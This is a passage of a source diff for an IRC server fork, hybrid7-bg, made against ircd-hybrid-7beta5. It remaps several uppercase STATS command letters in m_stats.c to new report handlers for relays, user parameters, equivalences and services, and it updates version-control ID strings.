  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *  $Id: m_stats.c,v 1.71 2001/05/05 21:56:11 fl_ Exp $
+ *  $Id: m_stats.c,v 1.5 2002/06/01 07:35:39 Administrator Exp $
  */
 #include "tools.h"	 /* dlink_node/dlink_list */
 #include "handlers.h"    /* m_pass prototype */
@@ -121,8 +121,12 @@
 static void stats_shared(struct Client *);
 static void stats_servers(struct Client *);
 static void stats_gecos(struct Client *);
+static void stats_userparms(struct Client *);
 static void stats_class(struct Client *);
 static void stats_memory(struct Client *);
+static void stats_services(struct Client *);
+static void stats_equivs(struct Client *);
+static void stats_relays(struct Client *);
 static void stats_servlinks(struct Client *);
 static void stats_ltrace(struct Client *, int, char**);
 
@@ -161,7 +165,7 @@
   { 'q',	stats_quarantine,	1,	0,	},
   { 'Q',	stats_quarantine,	1,	0,	},
   { 'r',	stats_usage,		1,	0,	},
-  { 'R',	stats_usage,		1,	0,	},
+  { 'R',	stats_relays,		1,	0,	},
   { 't',	stats_tstats,		1,	0,	},
   { 'T',	stats_tstats,		1,	0,	},
   { 'u',	stats_uptime,		0,	0,	},
@@ -169,11 +173,11 @@
   { 'v',	stats_servers,		1,	0,	},
   { 'V',	stats_servers,		1,	0,	},
   { 'x',	stats_gecos,		1,	0,	},
-  { 'X',	stats_gecos,		1,	0,	},
+  { 'X',	stats_userparms,		1,	0,	},
   { 'y',	stats_class,		1,	0,	},
-  { 'Y',	stats_class,		1,	0,	},
+  { 'Y',	stats_equivs,		1,	0,	},
   { 'z',	stats_memory,		1,	0,	},
-  { 'Z',	stats_memory,		1,	0,	},
+  { 'Z',	stats_services,		1,	0,	},
   { '?',	stats_servlinks,	1,	0,	},
   { (char) 0, 	(void (*)()) 0,		0,	0,	}
 };
@@ -381,6 +385,21 @@
   report_qlines(client_p);
 }
 
+static void stats_services(struct Client *client_p)
+{
+  report_zlines(client_p);
+}
+
+static void stats_equivs(struct Client *client_p)
+{
+  report_equivs(client_p);
+}
+
+static void stats_relays(struct Client *client_p)
+{
+  report_relays(client_p);
+}
+
 static void stats_usage(struct Client *client_p)
 {
   send_usage(client_p);
@@ -416,6 +435,11 @@
 static void stats_gecos(struct Client *client_p)
 {
   report_specials(client_p, CONF_XLINE, RPL_STATSXLINE);
+}
+
+static void stats_userparms(struct Client *client_p)
+{
+  report_userparms(client_p);
 }
 
 static void stats_class(struct Client *client_p)
diff -uNrd ircd-hybrid-7beta5/modules/m_svinfo.c hybrid7-bg/modules/m_svinfo.c
--- ircd-hybrid-7beta5/modules/m_svinfo.c	Wed Apr  4 11:22:36 2001
+++ hybrid7-bg/modules/m_svinfo.c	Tue Jun  5 12:35:45 2001
@@ -20,7 +20,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_svinfo.c,v 1.19 2001/04/04 15:22:36 androsyn Exp $
+ *   $Id: m_svinfo.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $
  */
 #include "handlers.h"
 #include "client.h"
